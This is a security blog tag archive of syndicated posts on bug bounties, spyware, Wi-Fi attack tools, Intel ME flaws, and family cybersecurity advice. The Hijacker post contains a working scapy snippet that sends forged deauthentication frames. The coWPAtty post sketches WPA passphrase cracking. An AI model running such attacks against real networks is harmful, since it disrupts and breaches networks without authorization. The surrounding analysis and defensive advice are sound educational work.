Tag Archives: SSID

Setting up bug bounties for success

Post Syndicated from Michal Zalewski original https://lcamtuf.blogspot.com/2018/03/setting-up-bug-bounties-for-success.html

Bug bounties end up in the news with some regularity, usually for the wrong reasons. I’ve been itching to write
about that for a while – but instead of dwelling on the mistakes of the bygone days, I figured it may be better to
talk about some of the ways to get vulnerability rewards right.

What do you get out of bug bounties?

There are plenty of differing views, but I like to think of such programs
simply as a bid on researchers’ time. In the most basic sense, you get three benefits:

  • Improved ability to detect bugs in production before they become major incidents.
  • A comparatively unbiased feedback loop to help you prioritize and measure other security work.
  • A robust talent pipeline for when you need to hire.

What don’t bug bounties offer?

You don’t get anything resembling a comprehensive security program or a systematic assessment of your platforms.
Researchers end up looking for bugs that offer favorable effort-to-payoff ratios given their skills and the
very imperfect information they have about your enterprise. In other words, you may end up with a hundred
people looking for XSS and just one person looking for RCE.

Your reward structure can steer them toward the targets and bugs you care about, but it’s difficult to fully
eliminate this inherent skew. There’s only so far you can jack up your top-tier rewards, and only so far you can
go lowering the bottom-tier ones.

Don’t you have to outcompete the black market to get all the “good” bugs?

There is a free market price discovery component to it all: if you’re not getting the engagement you
were hoping for, you should probably consider paying more.

That said, there are going to be researchers who’d rather hurt you than work for you, no matter how much you pay;
you don’t have to win them over, and you don’t have to outspend every authoritarian government or
every crime syndicate. A bug bounty is effective simply if it attracts enough eyeballs to make bugs statistically
harder to find, and reduces the useful lifespan of any zero-days in black market trade. Plus, most
researchers don’t want their work to be used to crack down on dissidents in Egypt or Vietnam.

Another factor is that you’re paying for different things: a black market buyer probably wants a reliable exploit
capable of delivering payloads, and then demands silence for months or years to come; a vendor-run
bug bounty program is usually perfectly happy with a reproducible crash and doesn’t mind a researcher blogging
about their work.

In fact, while money is important, you will probably find out that it’s not enough to retain your top talent;
many folks want bug bounties to be more than a business transaction, and find a lot of value in having a close
relationship with your security team, comparing notes, and growing together. Fostering that partnership can
be more important than adding another $10,000 to your top reward.

How do I prevent it all from going horribly wrong?

Bug bounties are an unfamiliar beast to most lawyers and PR folks, so it’s natural to be wary and to try to plan
for every eventuality with pages and pages of impenetrable rules and fine-print legalese.

This is generally unnecessary: there is a strong self-selection bias, and almost every participant in a
vulnerability reward program will be coming to you in good faith. The more friendly, forthcoming, and
approachable you seem, and the more you treat them like peers, the more likely it is for your relationship to stay
positive. On the flip side, there is no faster way to make enemies than to make a security researcher feel that they
are now talking to a lawyer or to the PR department.

Most people have strong opinions on disclosure policies; instead of imposing your own views, strive to patch reported bugs
reasonably quickly, and almost every reporter will play along. Demand that researchers cancel conference appearances,
take down blog posts, or sign NDAs, and you will sooner or later end up in the news.

But what if that’s not enough?

As with any business endeavor, mistakes will happen; total risk avoidance is seldom the answer. Learn to sincerely
apologize for mishaps; it’s not a sign of weakness to say “sorry, we messed up”. And you will almost certainly
not end up in court for doing so.

It’s good to foster a healthy and productive relationship with the community, so that they come to your defense when
something goes wrong. Encouraging people to disclose bugs and talk about their experiences is one way of accomplishing that.

What about extortion?

You should structure your program to naturally discourage bad behavior and make it stand out like a sore thumb.
Require bona fide reports with complete technical details before any reward decision is made by a panel of named peers;
and make it clear that you never demand non-disclosure as a condition of getting a reward.

To avoid researchers accidentally putting themselves in awkward situations, have clear rules around data exfiltration
and lateral movement: assure them that you will always pay based on the worst-case impact of their findings; in exchange,
ask them to stop as soon as they get a shell and never access any data that isn’t their own.

So… are there any downsides?

Yep. Other than souring your relationship with the community if you implement your program wrong, the other consideration
is that bug bounties tend to generate a lot of noise from well-meaning but less-skilled researchers.

When this happens, do not get frustrated and do not penalize such participants; instead, help them grow. Consider
publishing educational articles, giving advice on how to investigate and structure reports, or
offering free workshops every now and then.

The other downside is cost; although bug bounties tend to offer far more bang for your buck than your average penetration
test, they are more random. The annual expenses tend to be fairly predictable, but there is always
some possibility of having to pay multiple top-tier rewards in rapid succession. This is the kind of uncertainty that
many mid-level budget planners react badly to.

Finally, you need to be able to fix the bugs you receive. It would be nuts to prefer to not know about the
vulnerabilities in the first place – but once you invite the research, the clock starts ticking and you need to
ship fixes reasonably fast.

So… should I try it?

There are folks who enthusiastically advocate for bug bounties in every conceivable situation, and people who dislike them
with fierce passion; both sentiments are usually strongly correlated with the line of business they are in.

In reality, bug bounties are not a cure-all, and there are some ways to make them ineffectual or even dangerous.
But they are not as risky or expensive as most people suspect, and when done right, they can actually be fun for your
team, too. You won’t know for sure until you try.

Dark Caracal: Global Espionage Malware from Lebanon

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/01/dark_caracal_gl.html

The EFF and Lookout are reporting on a new piece of spyware operating out of Lebanon. It primarily targets mobile devices compromised through fake versions of secure messaging clients like Signal and WhatsApp.

From the Lookout announcement:

Dark Caracal has operated a series of multi-platform campaigns starting from at least January 2012, according to our research. The campaigns span across 21+ countries and thousands of victims. Types of data stolen include documents, call records, audio recordings, secure messaging client content, contact information, text messages, photos, and account data. We believe this actor is operating their campaigns from a building belonging to the Lebanese General Security Directorate (GDGS) in Beirut.

It looks like a complex infrastructure that’s been well-developed, and continually upgraded and maintained. It appears that a cyberweapons arms manufacturer is selling this tool to different countries. From the full report:

Dark Caracal is using the same infrastructure as was previously seen in the Operation Manul campaign, which targeted journalists, lawyers, and dissidents critical of the government of Kazakhstan.

There’s a lot in the full report. It’s worth reading.

Three news articles.

Hijacker – Reaver For Android Wifi Hacker App

Post Syndicated from Darknet original https://www.darknet.org.uk/2018/01/hijacker-reaver-android-wifi-hacker-app/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

Hijacker is a native GUI that provides Reaver for Android along with Aircrack-ng, Airodump-ng, and MDK3, making it a powerful Wifi hacker app.

It offers a simple and easy UI to use these tools without typing commands in a console or copying and pasting MAC addresses.

Features of Hijacker Reaver For Android Wifi Hacker App
Information Gathering

  • View a list of access points and stations (clients) around you (even hidden ones)
  • View the activity of a specific network (by measuring beacons and data packets) and its clients
  • Statistics about access points and stations
  • See the manufacturer of a device (AP or station) from the OUI database (a lookup sketch follows this list)
  • See the signal power of devices and filter the ones that are closer to you
  • Save captured packets to a .cap file
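
As referenced above, an OUI lookup is just a prefix match of the first three bytes of a MAC address against the IEEE registry. A minimal sketch in Python (the two table entries are illustrative samples, not the full registry):

    # Hypothetical OUI lookup: the first three bytes of a MAC address
    # (the OUI) identify the manufacturer. Real tools ship the complete
    # IEEE registry; this tiny table is just for illustration.
    OUI_TABLE = {
        "F0:9F:C2": "Ubiquiti Networks",
        "00:03:93": "Apple",
    }

    def vendor(mac: str) -> str:
        return OUI_TABLE.get(mac.upper()[:8], "unknown")

    print(vendor("f0:9f:c2:12:34:56"))  # -> Ubiquiti Networks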

Reaver for Android Wifi Cracker Attacks

  • Deauthenticate all the clients of a network (either targeting each one individually or without a specific target; see the frame sketch after this list)
  • Deauthenticate a specific client from the network it’s connected to
  • MDK3 Beacon Flooding with custom options and SSID list
  • MDK3 Authentication DoS for a specific network or to every nearby AP
  • Capture a WPA handshake or gather IVs to crack a WEP network
  • Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter)
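
As referenced in the deauthentication item above, these attacks work by forging 802.11 deauth management frames. A minimal scapy sketch of such a frame (assumptions: a monitor-mode interface named wlan0mon, and placeholder MAC addresses):

    # Forge a deauthentication frame like the ones aireplay-ng/MDK3 send.
    # addr1 = receiver, addr2 = transmitter, addr3 = BSSID; reason 7 is
    # "Class 3 frame received from nonassociated station".
    from scapy.all import RadioTap, Dot11, Dot11Deauth, sendp

    ap = "AA:BB:CC:DD:EE:FF"      # placeholder access point BSSID
    client = "11:22:33:44:55:66"  # placeholder client; ff:ff:ff:ff:ff:ff targets all

    frame = RadioTap() / Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth(reason=7)
    sendp(frame, iface="wlan0mon", count=10, inter=0.1)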

Other Wifi Hacker App Features

  • Leave the app running in the background, optionally with a notification
  • Copy commands or MAC addresses to clipboard
  • Includes the required tools, no need for manual installation
  • Includes the nexmon driver and management utility for BCM4339 devices
  • Set commands to enable and disable monitor mode automatically
  • Crack .cap files with a custom wordlist
  • Create custom actions and run them on an access point or a client easily
  • Sort and filter Access Points and Stations with many parameters
  • Export all gathered information to a file
  • Add a persistent alias to a device (by MAC) for easier identification

Requirements to Crack Wifi Password with Android

This application requires an ARM Android device with an internal wireless adapter that supports Monitor Mode.

coWPAtty Download – Audit Pre-shared WPA Keys

Post Syndicated from Darknet original https://www.darknet.org.uk/2017/12/cowpatty-audit-pre-shared-wpa-keys/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

coWPAtty Download – Audit Pre-shared WPA Keys

coWPAtty is a C-based tool for running brute-force dictionary attacks against WPA-PSK and auditing pre-shared WPA keys.

If you are auditing WPA-PSK networks, you can use this tool to identify weak passphrases that were used to generate the PMK. Supply a libpcap capture file that includes the 4-way handshake, a dictionary file of passphrases to guess with, and the SSID for the network.
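
The SSID matters because WPA uses it as the salt when deriving the pairwise master key (PMK) from the passphrase, and that derivation is the expensive step a dictionary attack must repeat for every guess. A minimal Python sketch of the derivation (the word list and SSID are made-up examples):

    # WPA-PSK key derivation: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID,
    # 4096 iterations, 32 bytes). A dictionary attack recomputes this
    # for each candidate passphrase and tests it against the captured
    # 4-way handshake.
    import hashlib

    def derive_pmk(passphrase: str, ssid: str) -> bytes:
        return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

    for word in ["password", "letmein", "dragonfly"]:  # toy dictionary
        print(word, derive_pmk(word, "ExampleSSID").hex())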

What is coWPAtty?

coWPAtty is the implementation of an offline dictionary attack against WPA/WPA2 networks using PSK-based authentication (e.g. WPA-Personal).

Potential impact of the Intel ME vulnerability

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/49611.html

(Note: this is my personal opinion based on public knowledge around this issue. I have no knowledge of any non-public details of these vulnerabilities, and this should not be interpreted as the position or opinion of my employer)

Intel’s Management Engine (ME) is a small coprocessor built into the majority of Intel CPUs[0]. Older versions were based on the ARC architecture[1] running an embedded realtime operating system, but from version 11 onwards they’ve been small x86 cores running Minix. The precise capabilities of the ME have not been publicly disclosed, but it is at minimum capable of interacting with the network[2], display[3], USB, input devices and system flash. In other words, software running on the ME is capable of doing a lot, without requiring any OS permission in the process.

Back in May, Intel announced a vulnerability in the Active Management Technology (AMT) that runs on the ME. AMT offers functionality like providing a remote console to the system (so IT support can connect to your system and interact with it as if they were physically present), remote disk support (so IT support can reinstall your machine over the network) and various other bits of system management. The vulnerability meant that it was possible to log into systems with AMT enabled using an empty authentication token, making it possible to log in without knowing the configured password.
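
Published analyses of that earlier flaw (CVE-2017-5689) describe the root cause as the digest response being compared only up to the length of the attacker-supplied string, so an empty response always matched. A toy Python illustration of that logic, not Intel's actual code:

    # Toy illustration of the reported AMT authentication flaw: the
    # comparison only covered as many characters as the user supplied,
    # so an empty response "matched" any stored digest.
    def flawed_check(computed_digest: str, user_response: str) -> bool:
        return computed_digest[:len(user_response)] == user_response

    print(flawed_check("a94a8fe5ccb19ba61c4c0873d391e987", ""))       # True: login succeeds
    print(flawed_check("a94a8fe5ccb19ba61c4c0873d391e987", "wrong"))  # False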

This vulnerability was less serious than it could have been for a couple of reasons – the first is that “consumer”[4] systems don’t ship with AMT, and the second is that AMT is almost always disabled (Shodan found only a few thousand systems on the public internet with AMT enabled, out of many millions of laptops). I wrote more about it here at the time.

How does this compare to the newly announced vulnerabilities? Good question. Two of the announced vulnerabilities are in AMT. The previous AMT vulnerability allowed you to bypass authentication, but restricted you to doing what AMT was designed to let you do. While AMT gives an authenticated user a great deal of power, it’s also designed with some degree of privacy protection in mind – for instance, when the remote console is enabled, an animated warning border is drawn on the user’s screen to alert them.

This vulnerability is different in that it allows an authenticated attacker to execute arbitrary code within the AMT process. This means that the attacker shouldn’t have any capabilities that AMT doesn’t, but it’s unclear where various aspects of the privacy protection are implemented – for instance, if the warning border is implemented in AMT rather than in hardware, an attacker could duplicate that functionality without drawing the warning. If the USB storage emulation for remote booting is implemented as a generic USB passthrough, the attacker could pretend to be an arbitrary USB device and potentially exploit the operating system through bugs in USB device drivers. Unfortunately we don’t currently know.

Note that this exploit still requires two things – first, AMT has to be enabled, and second, the attacker has to be able to log into AMT. If the attacker has physical access to your system and you don’t have a BIOS password set, they will be able to enable it – however, if AMT isn’t enabled and the attacker isn’t physically present, you’re probably safe. But if AMT is enabled and you haven’t patched the previous vulnerability, the attacker will be able to access AMT over the network without a password and then proceed with the exploit. This is bad, so you should probably (1) ensure that you’ve updated your BIOS and (2) ensure that AMT is disabled unless you have a really good reason to use it.

The AMT vulnerability applies to a wide range of versions, everything from version 6 (which shipped around 2008) onwards. The other vulnerability that Intel describe is restricted to version 11 of the ME, which only applies to much more recent systems. This vulnerability allows an attacker to execute arbitrary code on the ME, which means they can do literally anything the ME is able to do. This probably also means that they are able to interfere with any other code running on the ME. While AMT has been the most frequently discussed part of this, various other Intel technologies are tied to ME functionality.

Intel’s Platform Trust Technology (PTT) is a software implementation of a Trusted Platform Module (TPM) that runs on the ME. TPMs are intended to protect access to secrets and encryption keys and record the state of the system as it boots, making it possible to determine whether a system has had part of its boot process modified and denying access to the secrets as a result. The most common usage of TPMs is to protect disk encryption keys – Microsoft Bitlocker defaults to storing its encryption key in the TPM, automatically unlocking the drive if the boot process is unmodified. In addition, TPMs support something called Remote Attestation (I wrote about that here), which allows the TPM to provide a signed copy of information about what the system booted to a remote site. This can be used for various purposes, such as not allowing a compute node to join a cloud unless it’s booted the correct version of the OS and is running the latest firmware version. Remote Attestation depends on the TPM having a unique cryptographic identity that is tied to the TPM and inaccessible to the OS.
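
As a rough conceptual sketch (not Intel's PTT implementation), a TPM records boot state by folding each stage's measurement into a Platform Configuration Register, so the final value commits to every component in order:

    # Conceptual PCR extend: PCR_new = SHA256(PCR_old || measurement).
    # Changing any boot stage changes every subsequent PCR value, which
    # is what lets sealed secrets (e.g. disk encryption keys) detect a
    # modified boot process.
    import hashlib

    def extend(pcr: bytes, measurement: bytes) -> bytes:
        return hashlib.sha256(pcr + measurement).digest()

    pcr = bytes(32)  # PCRs start zeroed at reset
    for stage in (b"firmware", b"bootloader", b"kernel"):
        pcr = extend(pcr, hashlib.sha256(stage).digest())
    print(pcr.hex())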

PTT allows manufacturers to simply license some additional code from Intel and run it on the ME rather than having to pay for an additional chip on the system motherboard. This seems great, but if an attacker is able to run code on the ME then they potentially have the ability to tamper with PTT, which means they can obtain access to disk encryption secrets and circumvent Bitlocker. It also means that they can tamper with Remote Attestation, “attesting” that the system booted a set of software that it didn’t or copying the keys to another system and allowing that to impersonate the first. This is, uh, bad.

Intel also recently announced Intel Online Connect, a mechanism for providing the functionality of security keys directly in the operating system. Components of this are run on the ME in order to avoid scenarios where a compromised OS could be used to steal the identity secrets – if the ME is compromised, this may make it possible for an attacker to obtain those secrets and duplicate the keys.

It’s also not entirely clear how much of Intel’s Software Guard Extensions (SGX) functionality depends on the ME. The ME does appear to be required for SGX Remote Attestation (which allows an application using SGX to prove to a remote site that it’s the SGX app rather than something pretending to be it), and again if those secrets can be extracted from a compromised ME it may be possible to compromise some of the security assumptions around SGX. Again, it’s not clear how serious this is because it’s not publicly documented.

Various other things also run on the ME, including stuff like video DRM (ensuring that high resolution video streams can’t be intercepted by the OS). It may be possible to obtain encryption keys from a compromised ME that allow things like Netflix streams to be decoded and dumped. From a user privacy or security perspective, these things seem less serious.

The big problem at the moment is that we have no idea what the actual process of compromise is. Intel state that it requires local access, but don’t describe what kind. Local access in this case could simply require the ability to send commands to the ME (possible on any system that has the ME drivers installed), could require direct hardware access to the exposed ME (which would require either kernel access or the ability to install a custom driver) or even the ability to modify system flash (possible only if the attacker has physical access and enough time and skill to take the system apart and modify the flash contents with an SPI programmer). The other thing we don’t know is whether it’s possible for an attacker to modify the system such that the ME is persistently compromised or whether it needs to be re-compromised every time the ME reboots. Note that even the latter is more serious than you might think – the ME may only be rebooted if the system loses power completely, so even a “temporary” compromise could affect a system for a long period of time.

It’s also almost impossible to determine if a system is compromised. If the ME is compromised then it’s probably possible for it to roll back any firmware updates but still report that it’s been updated, giving admins a false sense of security. The only way to determine for sure would be to dump the system flash and compare it to a known good image. This is impractical to do at scale.

So, overall, given what we know right now it’s hard to say how serious this is in terms of real world impact. It’s unlikely that this is the kind of vulnerability that would be used to attack individual end users – anyone able to compromise a system like this could just backdoor your browser instead with much less effort, and that already gives them your banking details. The people who have the most to worry about here are potential targets of skilled attackers, which means activists, dissidents and companies with interesting personal or business data. It’s hard to make strong recommendations about what to do here without more insight into what the vulnerability actually is, and we may not know that until this presentation next month.

Summary: Worst case here is terrible, but unlikely to be relevant to the vast majority of users.

[0] Earlier versions of the ME were built into the motherboard chipset, but as portions of that were incorporated onto the CPU package the ME followed
[1] A descendant of the SuperFX chip used in Super Nintendo cartridges such as Star Fox, because why not
[2] Without any OS involvement for wired ethernet and for wireless networks in the system firmware, but requires OS support for wireless access once the OS drivers have loaded
[3] Assuming you’re using integrated Intel graphics
[4] “Consumer” is a bit of a misnomer here – “enterprise” laptops like Thinkpads ship with AMT, but are often bought by consumers.

Your Holiday Cybersecurity Guide

Post Syndicated from Robert Graham original http://blog.erratasec.com/2017/11/your-holiday-cybersecurity-guide.html

Many of us are visiting parents/relatives this Thanksgiving/Christmas, and will have an opportunity to help them with cybersecurity issues. I thought I’d write up a quick guide of the most important things.

1. Stop them from reusing passwords

By far the biggest threat to average people is that they re-use the same password across many websites, so that when one website gets hacked, all their accounts get hacked.
To demonstrate the problem, go to haveibeenpwned.com and enter the email addresses of your relatives. This will show them a number of sites where their passwords have already been stolen, like LinkedIn, Adobe, etc. That should convince them of the severity of the problem.
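
The same service also offers a k-anonymity range API for checking passwords without ever sending the password itself: only the first five hex characters of its SHA-1 hash leave the machine. A small Python sketch (the password shown is just an example):

    # Check a password against Have I Been Pwned's range API. Only the
    # 5-character hash prefix is sent; the full hash never leaves home.
    import hashlib
    import urllib.request

    def pwned_count(password: str) -> int:
        digest = hashlib.sha1(password.encode()).hexdigest().upper()
        prefix, suffix = digest[:5], digest[5:]
        req = urllib.request.Request(
            f"https://api.pwnedpasswords.com/range/{prefix}",
            headers={"User-Agent": "pwned-check-example"},
        )
        with urllib.request.urlopen(req) as resp:
            for line in resp.read().decode().splitlines():
                candidate, _, count = line.partition(":")
                if candidate == suffix:
                    return int(count)
        return 0

    print(pwned_count("password123"))  # non-zero means it appears in known breaches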

They don’t need a separate password for every site. For the majority of websites, you don’t care whether your account there gets hacked. Use a common password for all the meaningless sites. You only need unique passwords for important accounts, like email, Facebook, and Twitter.

Write down passwords and store them in a safe place. Sure, it’s a common joke that people in offices write passwords on Post-It notes stuck on their monitors or under their keyboards. This is a common security mistake, but that’s only because the office environment is widely accessible. Your home isn’t, and there’s plenty of places to store written passwords securely, such as in a home safe. Even if it’s just a desk drawer, such passwords are safe from hackers, because they aren’t on a computer.

Write them down, with pen and paper. Don’t put them in a MyPasswords.doc, because when a hacker breaks in, they’ll easily find that document and easily hack your accounts.

You might help them out with getting a password manager, or two-factor authentication (2FA). Good 2FA like YubiKey will stop a lot of phishing threats. But this is difficult technology to learn, and of course, you’ll be on the hook for support issues, such as when they lose the device. Thus, while 2FA is best, I’m only recommending pen-and-paper to store passwords. (AccessNow has a guide, though I think YubiKey/U2F keys for Facebook and GMail are the best).

2. Lock their phone (passcode, fingerprint, faceprint)
You’ll lose your phone at some point. It has the keys to all your accounts, like email and so on. With your email, phone thieves can then reset the passwords on all your other accounts. Thus, it’s incredibly important to lock the phone.

Apple has made this especially easy with fingerprints (and now faceprints), so there’s little excuse not to lock the phone.

Note that Apple iPhones are the most secure. I give my mother my old iPhones so that she has something secure.

My mom demonstrates a problem you’ll have with the older generation: she doesn’t reliably have her phone with her, or charged. She’s the opposite of my dad, who is slavishly attached to his phone. Even a small added hurdle like locking her phone makes it even more likely she won’t have it with her when you need to call her.

3. WiFi (WPA)
Make sure their home WiFi is WPA encrypted. It probably already is, but it’s worth checking.

The password should be written down on the same piece of paper as all the other passwords. This is important. My parents just moved, Comcast installed a WiFi access point for them, and they promptly lost the piece of paper. When I wanted to debug something on their network today, they didn’t know the password and couldn’t find the paper. Get that password written down in a place it won’t get lost!

Discourage them from using extra security features like “SSID hiding” and/or “MAC address filtering”. They provide no security benefit, and actually make security worse. Hiding the SSID means a phone has to advertise it when away from home, and MAC filtering makes MAC address randomization harder, both of which make you easier to track.
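
To make the SSID-hiding point concrete: a client configured for a “hidden” network has to name that network in its probe requests wherever it goes, and anyone in radio range can watch for them. A minimal scapy sketch, assuming a monitor-mode interface named wlan0mon:

    # Print which SSIDs nearby devices are probing for. Clients of
    # "hidden" networks must include the SSID in their probe requests,
    # which is exactly the leak described above.
    from scapy.all import sniff, Dot11ProbeReq

    def show_probe(pkt):
        if pkt.haslayer(Dot11ProbeReq):
            ssid = pkt.info.decode(errors="replace")
            if ssid:  # broadcast probes carry an empty SSID field
                print(pkt.addr2, "is looking for", ssid)

    sniff(iface="wlan0mon", prn=show_probe, timeout=60)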

If they have a really old home router, you should probably replace it, or at least update the firmware. A lot of old routers have vulnerabilities that allow hackers (like me, masscanning the Internet) to easily break in.

4. Ad blockers or Brave

Most of the online tricks that will confuse your older parents will come via advertising, such as popups claiming “You are infected with a virus, click here to clean it”. Installing an ad blocker in the browser, such as uBlock Origin, stops almost all of this nonsense.

For example, here’s a screenshot of going to the “Speedtest” website to test the speed of my connection (I took this on the plane on the way home for Thanksgiving). Ignore the error (the plane’s firewall blocks Speedtest) — but instead look at the advertising banner across the top of the page insisting you need to download a browser extension. This is tricking you into installing malware — the ad appears as if it’s a message from Speedtest, but it’s not. Speedtest is just selling advertising and has no clue what the banner says. This sort of thing needs to be blocked — it fools even the technologically competent.

uBlock Origin for Chrome is the one I use. Another option is to replace their browser with Brave, a browser that blocks ads but, at the same time, allows micropayments to websites you want to support. I use Brave on my iPhone.
A side benefit of ad blockers or Brave is that web surfing becomes much faster, since you aren’t downloading all this advertising. The smallest NYTimes story is 15 megabytes in size due to all the advertisements, for example.

5. Cloud Backups
Do backups, in the cloud. It’s a good idea in general, especially with the threat of ransomware these days.

In particular, consider your photos. Over time, they will be lost, because people make no effort to keep track of them. All hard drives will eventually crash, deleting your photos. Sure, a few key ones are backed up on Facebook for life, but the rest aren’t.
There are so many excellent online backup services out there, like Dropbox and Backblaze. Or, you can use the iCloud feature that Apple provides. My favorite is Microsoft’s: I already pay $99 a year for an Office 365 subscription, and it comes with 1 terabyte of online storage.

6. Separate email accounts
You should have three email accounts: work, personal, and financial.

First, you really need to separate your work account from your personal one. The IT department is already seeing misdirected emails between you and your spouse/lover that they don’t want to see. Any conflict with your work, such as getting fired, gives your private correspondence to their lawyers.

Second, you need a wholly separate account for financial stuff, like Amazon.com, your bank, PayPal, and so on. That prevents confusion with phishing attacks.

Consider this warning today:

If you had split accounts, you could safely ignore this. The USPS would only know your financial email account, which gets no phishing attacks, because it’s not widely known. When you receive the phishing attack on your personal email, you ignore it, because you know the USPS doesn’t know your personal email account.

Phishing emails are so sophisticated that even experts can’t tell the difference. Splitting financial from personal emails makes it so you don’t have to tell the difference — anything financial sent to personal email can safely be ignored.

7. Deauth those apps!

Twitter user @tompcoleman comments that we also need to deauthorize apps.

Social media sites like Facebook, Twitter, and Google encourage you to enable “apps” that work with their platforms, often demanding privileges to generate messages on your behalf. The typical scenario is that you use them only once or twice and forget about them.

A lot of them are hostile. For example, my niece’s Twitter account would occasionally send out advertisements, and she didn’t know why. It’s because a long time ago, she enabled an app with the permission to send tweets for her. I had to sit down and get rid of most of her apps.

Now would be a good time to go through your relatives’ Facebook, Twitter, and Google/GMail accounts and disable those apps. Don’t be afraid to be ruthless — they probably weren’t using them anyway. Some will still be necessary. For example, Twitter for iPhone shows up in the list of Twitter apps. The URL for editing these apps for Twitter is https://twitter.com/settings/applications. The Google link is here (thanks @spextr). I don’t know of simple URLs for Facebook, but you should find it somewhere under privacy/security settings.
Update: Here’s a more complete guide covering even more social media services.
https://www.permissions.review/

8. Up-to-date software? Maybe

I put this last because it can be so much work.

You should install the latest OS (Windows 10, macOS High Sierra), and also turn on automatic patching.

But remember it may not be worth the huge effort involved. I want my parents to be secure — but not so secure that I have to deal with issues.

For example, when my parents updated their HP print software, the desktop icon my mom usually uses to scan things in from the printer disappeared, and I needed to spend 15 minutes with her helping find the new way to access the software.
However, I did get my mom a new netbook to travel with instead of the old WinXP one. I want to get her a Chromebook, but she doesn’t want one.
For iOS, you can probably make sure their phones have the latest version without having these usability problems.

Conclusion

You can’t solve every problem for your relatives, but these are the more critical ones.

Book Review: Twitter and Tear Gas, by Zeynep Tufekci

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/07/book_review_twi.html

There are two opposing models of how the Internet has changed protest movements. The first is that the Internet has made protesters mightier than ever. This comes from the successful revolutions in Tunisia (2010-11), Egypt (2011), and Ukraine (2013). The second is that it has made them more ineffectual. Derided as “slacktivism” or “clicktivism,” the ease of action without commitment can result in movements like Occupy petering out in the US without any obvious effects. Of course, the reality is more nuanced, and Zeynep Tufekci teases that out in her new book Twitter and Tear Gas.

Tufekci is a rare interdisciplinary figure. As a sociologist, programmer, and ethnographer, she studies how technology shapes society and drives social change. She has a dual appointment in both the School of Information Science and the Department of Sociology at University of North Carolina at Chapel Hill, and is a Faculty Associate at the Berkman Klein Center for Internet and Society at Harvard University. Her regular New York Times column on the social impacts of technology is a must-read.

Modern Internet-fueled protest movements are the subjects of Twitter and Tear Gas. As an observer, writer, and participant, Tufekci examines how modern protest movements have been changed by the Internet — and what that means for protests going forward. Her book combines her own ethnographic research and her usual deft analysis, with the research of others and some big data analysis from social media outlets. The result is a book that is both insightful and entertaining, and whose lessons are much broader than the book’s central topic.

“The Power and Fragility of Networked Protest” is the book’s subtitle. The power of the Internet as a tool for protest is obvious: it gives people newfound abilities to quickly organize and scale. But, according to Tufekci, it’s a mistake to judge modern protests using the same criteria we used to judge pre-Internet protests. The 1963 March on Washington might have culminated in hundreds of thousands of people listening to Martin Luther King Jr. deliver his “I Have a Dream” speech, but it was the culmination of a multi-year protest effort and the result of six months of careful planning made possible by that sustained effort. The 2011 protests in Cairo came together in mere days because they could be loosely coordinated on Facebook and Twitter.

That’s the power. Tufekci describes the fragility by analogy. Nepalese Sherpas assist Mt. Everest climbers by carrying supplies, laying out ropes and ladders, and so on. This means that people with limited training and experience can make the ascent, which is no less dangerous — with sometimes disastrous results. Says Tufekci: “The Internet similarly allows networked movements to grow dramatically and rapidly, but without prior building of formal or informal organizational and other collective capacities that could prepare them for the inevitable challenges they will face and give them the ability to respond to what comes next.” That makes them less able to respond to government counters, change their tactics — a phenomenon Tufekci calls “tactical freeze” — make movement-wide decisions, and survive over the long haul.

Tufekci isn’t arguing that modern protests are necessarily less effective, but that they’re different. Effective movements need to understand these differences, and leverage these new advantages while minimizing the disadvantages.

To that end, she develops a taxonomy for talking about social movements. Protests are an example of a “signal” that corresponds to one of several underlying “capacities.” There’s narrative capacity: the ability to change the conversation, as Black Lives Matter did with police violence and Occupy did with wealth inequality. There’s disruptive capacity: the ability to stop business as usual. An early Internet example is the 1999 WTO protests in Seattle. And finally, there’s electoral or institutional capacity: the ability to vote, lobby, fund raise, and so on. Because of various “affordances” of modern Internet technologies, particularly social media, the same signal — a protest of a given size — reflects different underlying capacities.

This taxonomy also informs government reactions to protest movements. Smart responses target attention as a resource. The Chinese government responded to the 2014 protesters in Hong Kong by not engaging with them at all, denying them camera-phone videos that would go viral and attract the world’s attention. Instead, they pulled their police back and waited for the movement to die from lack of attention.

If this all sounds dry and academic, it’s not. Twitter and Tear Gas is infused with a richness of detail stemming from her personal participation in the 2013 Gezi Park protests in Turkey, as well as personal on-the-ground interviews with protesters throughout the Middle East — particularly Egypt and her native Turkey — Zapatistas in Mexico, WTO protesters in Seattle, Occupy participants worldwide, and others. Tufekci writes with a warmth and respect for the humans that are part of these powerful social movements, gently intertwining her own story with the stories of others, big data, and theory. She is adept at writing for a general audience, and — despite being published by the intimidating Yale University Press — her book is more mass-market than academic. What rigor is there is presented in a way that carries readers along rather than distracting.

The synthesist in me wishes Tufekci would take some additional steps, taking the trends she describes outside of the narrow world of political protest and applying them more broadly to social change. Her taxonomy is an important contribution to the more-general discussion of how the Internet affects society. Furthermore, her insights on the networked public sphere have applications for understanding technology-driven social change in general. These are hard conversations for society to have. We largely prefer to allow technology to blindly steer society or — in some ways worse — leave it to unfettered for-profit corporations. When you’re reading Twitter and Tear Gas, keep current and near-term future technological issues such as ubiquitous surveillance, algorithmic discrimination, and automation and employment in mind. You’ll come away with new insights.

Tufekci twice quotes historian Melvin Kranzberg from 1985: “Technology is neither good nor bad; nor is it neutral.” This foreshadows her central message. For better or worse, the technologies that power the networked public sphere have changed the nature of political protest as well as government reactions to and suppressions of such protest.

I have long characterized our technological future as a battle between the quick and the strong. The quick — dissidents, hackers, criminals, marginalized groups — are the first to make use of a new technology to magnify their power. The strong are slower, but have more raw power to magnify. So while protesters are the first to use Facebook to organize, the governments eventually figure out how to use Facebook to track protesters. It’s still an open question who will gain the upper hand in the long term, but Tufekci’s book helps us understand the dynamics at work.

This essay originally appeared on Vice Motherboard.

The book on Amazon.com.

The Quick vs. the Strong: Commentary on Cory Doctorow’s Walkaway

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/05/the_quick_vs_th.html

